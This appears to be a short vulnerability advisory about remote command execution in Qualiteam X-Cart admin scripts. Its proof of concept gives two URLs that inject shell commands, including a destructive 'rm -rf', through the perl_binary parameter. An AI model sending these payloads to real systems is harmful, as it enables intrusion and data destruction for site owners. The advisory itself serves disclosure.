Qualiteam X-Cart Remote Command Execution Vulnerability

info
discussion
exploit
solution
references

Qualiteam X-Cart Remote Command Execution Vulnerability

No exploit is required to leverage this issue. The following proof of concept has been provided:

http://server/admin/upgrade.php?prepatch_errorcode=1&patch_files[0][orig_file]=VERSION&perl_binary=/bin/rm -rf &patch_exe=..

http://server/admin/general.php?mode=perlinfo&config[General][perl_binary]=/bin/ls -lR ||